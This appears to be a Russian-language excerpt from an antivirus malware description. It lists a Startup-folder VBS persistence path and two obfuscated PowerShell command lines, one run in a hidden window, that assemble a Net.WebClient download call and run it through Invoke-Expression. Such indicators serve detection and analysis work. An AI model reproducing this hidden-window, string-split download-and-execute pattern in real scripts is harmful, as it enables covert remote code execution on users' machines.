Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\555.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit $dsf='(New-Object Net.We'; $c4='bClient).gfsdfer'; $c3='gfgfder(''99'')';$TC=I`E`X ($dsf,$c4,$c3 -Join '')|I`E`X' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit $dsf='(New-Object Net.We'; $c4='bClient).gfsdfer'; $c3='gfgfder(''99'')';$TC=I`E`X ($dsf,$c4,$c3 -Join '')|I`E`X